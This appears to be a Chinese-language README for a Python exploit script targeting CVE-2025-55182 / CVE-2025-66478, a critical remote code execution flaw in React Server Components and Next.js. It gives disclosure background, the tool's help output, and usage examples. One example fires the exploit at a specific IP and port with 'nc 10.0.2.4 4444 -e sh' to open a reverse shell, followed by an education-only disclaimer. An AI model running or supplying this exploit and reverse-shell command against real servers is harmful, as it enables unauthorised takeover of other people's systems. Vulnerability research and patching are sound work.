由 infrar3d 开发
一个影响 React.js 服务器端使用的 10.0 严重性漏洞,在 React.js 中被跟踪为 CVE-2025-55182,在 Next.js 框架中被跟踪为 CVE-2025-66478。
该漏洞由 Lachlan Davidson 于 2025 年 11 月 29 日太平洋时间负责任地向 Meta 团队披露。React 和 Vercel 于 2025 年 12 月 3 日太平洋时间进行了初步披露和补丁发布。(原文:https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
本软件和概念验证代码仅供教育和研究目的使用。
您有责任遵守所有适用法律。请遵守道德并负责任地使用。